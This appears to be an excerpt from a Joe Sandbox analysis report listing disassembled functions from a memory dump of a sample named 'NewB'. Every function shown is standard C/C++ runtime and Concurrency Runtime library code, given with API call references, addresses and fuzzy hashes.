Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: f2b9ea1c583d4b47eb7f4d382392435f1aaee91168201b5c1ff9ed0b7bc52deb
Instruction ID: b5cb321be22554f0102169a04a1d89dcd7e1f64042a0bd1bb1d6d146e2124223
Opcode Fuzzy Hash: f2b9ea1c583d4b47eb7f4d382392435f1aaee91168201b5c1ff9ed0b7bc52deb
Instruction Fuzzy Hash: B1A011302022808F83008FBAAE8830C3AA8AB082C0B008028A000CA820EA2080C0CF00

Uniqueness

Uniqueness Score: -1.00%

Function 00192500 Relevance: .0, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ExceptionRaise__alloca_probe_16
String ID:
API String ID: 1905912502-0
Opcode ID: baa438e61e408488be69b73bfbd9c9a167bda835ba4e88a6a07120380bb802ff
Instruction ID: a093948ba1dfe86c96e68838989e5bc1fdc99074c59048845e39f46aeffe6417
Opcode Fuzzy Hash: baa438e61e408488be69b73bfbd9c9a167bda835ba4e88a6a07120380bb802ff
Instruction Fuzzy Hash: 88D05B7654464CFBC711CF55CD44F8A77ECE705760F504626B521D3790DB34E6048654

Uniqueness

Uniqueness Score: -1.00%

Function 001AF118 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 001AF3AB

Strings

pEvents, xrefs: 001AF3A3

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 90e918f89b6ee6f81847c41a0967f0d31844f72375ead4df65d02cc82868fc32
Instruction ID: b8ea1622f30ef2ad4a73ea3f686196ad78c193e9b754803722e2ef48d9170a53
Opcode Fuzzy Hash: 90e918f89b6ee6f81847c41a0967f0d31844f72375ead4df65d02cc82868fc32
Instruction Fuzzy Hash: 7A817A39D00219DBCF25DFE8C985BAEB7B5BF16310F24452DE801A7281DB35AD46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001AD11E Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(001F5790,00000FA0,?,?,001AD0FC), ref: 001AD12A
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,001AD0FC), ref: 001AD135
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,001AD0FC), ref: 001AD146
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001AD158
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001AD166
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,001AD0FC), ref: 001AD189
___scrt_fastfail.LIBCMT ref: 001AD19A
DeleteCriticalSection.KERNEL32(001F5790,00000007,?,?,001AD0FC), ref: 001AD1A5
CloseHandle.KERNEL32(00000000,?,?,001AD0FC), ref: 001AD1B5

Strings

kernel32.dll, xrefs: 001AD141
api-ms-win-core-synch-l1-2-0.dll, xrefs: 001AD130
WakeAllConditionVariable, xrefs: 001AD15E
SleepConditionVariableCS, xrefs: 001AD152

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: b1cf5bcd307fc9d4429cbc69cb38a9300281f77cc57df796880e930530d9caf2
Instruction ID: d59498b004a11bec8841c21c62f2dd673a210a0e94eebf5cf16c0d17bab9d2ae
Opcode Fuzzy Hash: b1cf5bcd307fc9d4429cbc69cb38a9300281f77cc57df796880e930530d9caf2
Instruction Fuzzy Hash: 05019235A40F51ABC7236BF17C4DA6E3769EB4AB417480114FA06DAA60DBB4C8C0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001C27C1 Relevance: 22.7, APIs: 15, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 001C27D3

Part of subcall function 001C25D1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C25F4

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 001C27F4
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 001C2801
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 001C284F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 001C28D6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 001C28E9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 001C2936

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: d712225d3c11fe30e6fff0c2594f84facfddf05772332c66a5d280a00207d9a9
Instruction ID: b406569f8bf1bd0e65bd57045f88dd0c65206701ddcb33b3db72a3eb3fb989b1
Opcode Fuzzy Hash: d712225d3c11fe30e6fff0c2594f84facfddf05772332c66a5d280a00207d9a9
Instruction Fuzzy Hash: 8C817A34900249ABDF169F94C991FFE7BB2AF65308F04409CEC416B292C776CD66DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001B45CF Relevance: 21.2, APIs: 14, Instructions: 189
timeregistryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ListArray.LIBCONCRT ref: 001B4629

Part of subcall function 001B440A: InitializeSListHead.KERNEL32(?,?,00000000,?,?), ref: 001B44D6
Part of subcall function 001B440A: InitializeSListHead.KERNEL32(?), ref: 001B44E0

ListArray.LIBCONCRT ref: 001B465D
Hash.LIBCMT ref: 001B46C6
Hash.LIBCMT ref: 001B46D6
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 001B476B
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 001B4778
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 001B4785
InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00001001), ref: 001B4792

Part of subcall function 001B9D34: std::bad_exception::bad_exception.LIBCMT ref: 001B9D56

RegisterWaitForSingleObject.KERNEL32(?,00000000,001B7B06,?,000000FF,00000000), ref: 001B481A
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 001B483C
GetLastError.KERNEL32(001B557C,?,?,00000000,?,?), ref: 001B484E
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 001B486B

Part of subcall function 001AFC9A: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,001B557C,00000008,?,001B4870,?,00000000,001B7AF7,?,7FFFFFFF,7FFFFFFF,00000000), ref: 001AFCB2

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001B4895

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: 16b574d9ba7fea71f944f798decebc7e2185acd9648912b33582ca952f69845e
Instruction ID: 505ae1c1f30461c588457ad14b4e79e2727495e8032d2818865f978788c21819
Opcode Fuzzy Hash: 16b574d9ba7fea71f944f798decebc7e2185acd9648912b33582ca952f69845e
Instruction Fuzzy Hash: AD818DB0A01B52BBD709DFB5C885BD9FBA8BF19700F10421AF528D7681CBB4A560CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001B2923 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 001B2932

Part of subcall function 001B3C1D: GetVersionExW.KERNEL32(?), ref: 001B3C41
Part of subcall function 001B3C1D: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 001B3CE0

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 001B2946
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 001B2967
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B29D0
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B2A04

Part of subcall function 001B08DE: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 001B08FE

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 001B2A84

Part of subcall function 001B244D: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 001B2461

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B2ACC

Part of subcall function 001B08B3: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 001B08CF

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B2AE0
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 001B2AF1
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 001B2B3E
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 001B2B63
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 001B2B6F

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 31e41eed2637612eabaa301650f73e0b22cbc5afbb5a4a10f194443047852e17
Instruction ID: 85681c0e997a5dec29d68a39fc8e9d49f4f1171a9eb095a101ff9d634a03a613
Opcode Fuzzy Hash: 31e41eed2637612eabaa301650f73e0b22cbc5afbb5a4a10f194443047852e17
Instruction Fuzzy Hash: 8B81F131A006168FCF18DFA8D9905FDBBB3BB58304B28416DD545E7A90DB30AD88CB94

Uniqueness

Uniqueness Score: -1.00%

Function 001CF2B0 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 001CF2F4

Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEEAA
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEEBC
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEECE
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEEE0
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEEF2
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEF04
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEF16
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEF28
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEF3A
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEF4C
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEF5E
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEF70
Part of subcall function 001CEE8D: _free.LIBCMT ref: 001CEF82

_free.LIBCMT ref: 001CF2E9

Part of subcall function 001CA7F5: HeapFree.KERNEL32(00000000,00000000,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?), ref: 001CA80B
Part of subcall function 001CA7F5: GetLastError.KERNEL32(?,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?,?), ref: 001CA81D

_free.LIBCMT ref: 001CF30B
_free.LIBCMT ref: 001CF320
_free.LIBCMT ref: 001CF32B
_free.LIBCMT ref: 001CF34D
_free.LIBCMT ref: 001CF360
_free.LIBCMT ref: 001CF36E
_free.LIBCMT ref: 001CF379
_free.LIBCMT ref: 001CF3B1
_free.LIBCMT ref: 001CF3B8
_free.LIBCMT ref: 001CF3D5
_free.LIBCMT ref: 001CF3ED

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2aafce4796e8dfd4686c2a0572e217fdae1c65b9a29477ee14848efcb01ca5c5
Instruction ID: bef759fcdeec60b9448bbd827a44b9600e34ccd838f96c2a52e505c7f4abea55
Opcode Fuzzy Hash: 2aafce4796e8dfd4686c2a0572e217fdae1c65b9a29477ee14848efcb01ca5c5
Instruction Fuzzy Hash: 0B313731600349EFEB22AA79DC45F5A73EABF20314F54582DE488D6191EF71ED82CA21

Uniqueness

Uniqueness Score: -1.00%

Function 001AFB61 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,001B3CD7), ref: 001AFB6F
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 001AFB7D
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 001AFB8B
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 001AFBB9
GetLastError.KERNEL32(?,?,?,001B3CD7), ref: 001AFBD4
GetLastError.KERNEL32(?,?,?,001B3CD7), ref: 001AFBE0
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 001AFBF6

Strings

kernel32.dll, xrefs: 001AFB6A
GetThreadGroupAffinity, xrefs: 001AFB83
SetThreadGroupAffinity, xrefs: 001AFB77
GetCurrentProcessorNumberEx, xrefs: 001AFBAE

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: d1c623a25dc132395e111640c2b67e499aede4ead78ca3212d16e2d8b784197f
Instruction ID: 9cfd8c187f6c36974cd24793d4fc909e96ef9dcdfa55b9c2aa0b602bbe1f74d1
Opcode Fuzzy Hash: d1c623a25dc132395e111640c2b67e499aede4ead78ca3212d16e2d8b784197f
Instruction Fuzzy Hash: 5301C435A04791ABD702BBFAAC9AEBF37BCEA09790310042AF501D5591EBB4D4818774

Uniqueness

Uniqueness Score: -1.00%

Function 001D1A0C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001D16C5: CreateFileW.KERNEL32(00000000,00000000,?,001D1AB5,?,?,00000000,?,001D1AB5,00000000,0000000C), ref: 001D16E2

GetLastError.KERNEL32 ref: 001D1B20
__dosmaperr.LIBCMT ref: 001D1B27
GetFileType.KERNEL32(00000000), ref: 001D1B33
GetLastError.KERNEL32 ref: 001D1B3D
__dosmaperr.LIBCMT ref: 001D1B46
CloseHandle.KERNEL32(00000000), ref: 001D1B66
CloseHandle.KERNEL32(001CA692), ref: 001D1CB3
GetLastError.KERNEL32 ref: 001D1CE5
__dosmaperr.LIBCMT ref: 001D1CEC

Strings

H, xrefs: 001D1C71

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: a5317d0df2bd53643fc94472f4f90f5e88cedcb66c6cfdb3822c3fe8d7f32259
Instruction ID: 36270f7166c40a456d2c79a4f4d52616df276e60dd724f9c6e01c256813164d9
Opcode Fuzzy Hash: a5317d0df2bd53643fc94472f4f90f5e88cedcb66c6cfdb3822c3fe8d7f32259
Instruction Fuzzy Hash: 5AA12632A04149BFCF199F68DC95BAE3BB1AB1A324F24015EF801AF3D1DB748952CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001C2A60 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 001C2A72

Part of subcall function 001C25D1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C25F4

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 001C2A93
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 001C2AA0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 001C2AEE
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 001C2B96
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 001C2BC8

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 65a3cd33cd170490340c3788f3113db18c37c153a5bd5e7b832d61fdb0373c9d
Instruction ID: 847e6fd413c4a101ddcc7e46b59d85be07acca6b80b56a6be43cd157b837383d
Opcode Fuzzy Hash: 65a3cd33cd170490340c3788f3113db18c37c153a5bd5e7b832d61fdb0373c9d
Instruction Fuzzy Hash: 6F718930900249ABDF16DFA8C981FBEBBB2AF65304F04409DEC416B292C776DD16DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001C5395 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 001C5490
type_info::operator==.LIBVCRUNTIME ref: 001C54B7
___TypeMatch.LIBVCRUNTIME ref: 001C55C3
IsInExceptionSpec.LIBVCRUNTIME ref: 001C569E
_UnwindNestedFrames.LIBCMT ref: 001C5725
CallUnexpected.LIBVCRUNTIME ref: 001C5740

Strings

csm, xrefs: 001C53D0
csm, xrefs: 001C543D
csm, xrefs: 001C54EE

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 638e6943fb20c27756bb719a977e0321a494e01b3c6cf0fbc82b1c2e8ff97abc
Instruction ID: 4a0c2e5815d4c8eefaca23cda1c09e2183c4a0334a618194995c8336fdf99924
Opcode Fuzzy Hash: 638e6943fb20c27756bb719a977e0321a494e01b3c6cf0fbc82b1c2e8ff97abc
Instruction Fuzzy Hash: 86C15B71800A19DFCF19DFA4C881EAEBBB6BF24311F54455EE8116B212D731EAE1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001B6ACB Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001B6B10
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 001B6B42
List.LIBCONCRT ref: 001B6B7D
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 001B6B8E
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 001B6BAA
List.LIBCONCRT ref: 001B6BE5
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 001B6BF6
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B6C11
List.LIBCONCRT ref: 001B6C4C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 001B6C59

Part of subcall function 001B5FD0: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B5FE8
Part of subcall function 001B5FD0: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001B5FFA

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
